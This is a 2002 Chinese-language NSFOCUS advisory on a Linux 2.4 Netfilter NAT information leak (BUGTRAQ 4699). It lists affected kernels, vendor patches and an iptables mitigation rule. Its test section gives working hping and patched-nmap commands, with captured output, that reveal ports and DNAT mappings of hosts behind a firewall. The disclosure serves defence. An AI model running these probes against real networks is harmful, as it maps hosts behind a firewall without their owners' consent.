首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第31期->最新漏洞
日期:2002-04-18
更新日期: 2002-5-14
受影响的系统:
Linux Netfilter
- Linux系统 kernel 2.4.9
- Linux系统 kernel 2.4.8
- Linux系统 kernel 2.4.7
- Linux系统 kernel 2.4.6
- Linux系统 kernel 2.4.5
- Linux系统 kernel 2.4.4
- Linux系统 kernel 2.4.19 -pre6
- Linux系统 kernel 2.4.19 -pre5
- Linux系统 kernel 2.4.19 -pre4
- Linux系统 kernel 2.4.19 -pre3
- Linux系统 kernel 2.4.19 -pre2
- Linux系统 kernel 2.4.19 -pre1
- Linux系统 kernel 2.4.19
- Linux系统 kernel 2.4.18
- Linux系统 kernel 2.4.17
- Linux系统 kernel 2.4.16
- Linux系统 kernel 2.4.15
- Linux系统 kernel 2.4.14
- Linux系统 kernel 2.4.13
- Linux系统 kernel 2.4.12
- Linux系统 kernel 2.4.11
- Linux系统 kernel 2.4.10
描述:
--------------------------------------------------------------------------
BUGTRAQ ID: 4699
Linux内核是Linux操作系统的核心部分,其中Netfilter是Linux内核的一个通用防火墙架构的实现。
Netfilter的NAT功能实现存在漏洞,可导致远程攻击者获得被NAT(地址或端口转换)后主机的端口信息。
攻击者可以小TTL值的TCP包给远程防火墙的特定端口,当此包路由到达防火墙并经过其NAT转换以后最终到达接收此包的主机时,主机会产生ICMP TTL过期的应答,ICMP包中的端口信息将不被NAT系统转换过后就直接回传,即应答的ICMP包回包含实际主机的端口信息。这可能导致远程攻击者收集到防火墙后目标主机端口开放情况的信息。
<*来源:Philippe Biondi (biondi@cartel-securite.fr)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-05/0049.html
https://www.redhat.com/support/errata/RHSA-2002-086.html
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-030.php
*>
测试程序:
--------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自
Philippe Biondi (biondi@cartel-securite.fr)提供了如下测试方法:
假如使用一机器(172.16.1.40)NAT端口666到172.16.3.26:22 :
iptables -t nat -A PREROUTING -p tcp --dport 666 -j DNAT --to
172.16.3.26:22
然后主机发送如下信息:
hping -t 1 --syn -p 666 172.16.1.40
可以截获如下的应答ICMP包:
17:07:46.709230 172.16.1.40 > 172.16.1.28: icmp: time exceeded in-transit
0x0000 45c0 0044 eaa6 0000 ff01 75f1 ac10 0128 E..D......u....(
0x0010 ac10 0118
0b00 516d 0000 0000
4500 0028 ......Qm....E..(
0x0020 b0f3 0000 0106 ac8a ac10 0118 ac10 031a <-+ ................
0x0030 04bd 0016 3206 3ec0 0490 00b4 5002 0200 | ....2.>.....P...
0x0040 d6b2 00^0 | ....
| 172.16.3.26
+-- port 22
你也可以尝试使用打过如下补丁的NMAP进行测试:
http://www.cartel-securite.fr/pbiondi/nmap/
# ./nmap -sS -P0 xxx.xxx.xxx.xxx -p 22,23,666,667 -t 9
Starting nmap V. 2.54BETA32 ( www.insecure.org/nmap/ )
Interesting ports on xxx.xxx.xxx.xxx:
Port State Service
22/tcp open ssh
23/tcp filtered telnet
666/tcp UNfiltered unknown DNAT to 192.168.8.10:22
667/tcp UNfiltered unknown DNAT to 192.168.26.10:22
Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
--------------------------------------------------------------------------
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在防火墙上禁止ICMP流量。
厂商补丁:
Linux
-----
目前Netfilter项目组已经发布了一个补丁以修复这个安全问题,请到厂商的主页下载:
Netfilter Patch 2002-04-02-icmp-dnat.html
http://www.netfilter.org/security/2002-04-02-icmp-dnat.html
MandrakeSoft
------------
MandrakeSoft已经为此发布了一个安全公告(MDKSA-2002:030):
MDKSA-2002:030:temporary fix for netfilter information leak
链接:http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-030.php3
暂时还没有补丁下载,建议增加一条如下的iptables规则:
iptables -A OUTPUT -m state -p icmp --state INVALID -j DROP
使系统不受此漏洞的影响。
Updated Packages:
None currently available.
上述升级软件还可以在下列地址中的任意一个镜像ftp服务器上下载:
http://www.mandrakesecure.net/en/ftp.php
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2002:086-05):
RHSA-2002:086-05:Netfilter information leak
链接:https://www.redhat.com/support/errata/RHSA-2002-086.html
RedHat还没有开发出一个好的补丁,建议增加如下的一条iptables规则:
iptables -A OUTPUT -m state -p icmp --state INVALID -j DROP
可以暂时不受此漏洞的影响。
版权所有,未经许可,不得转载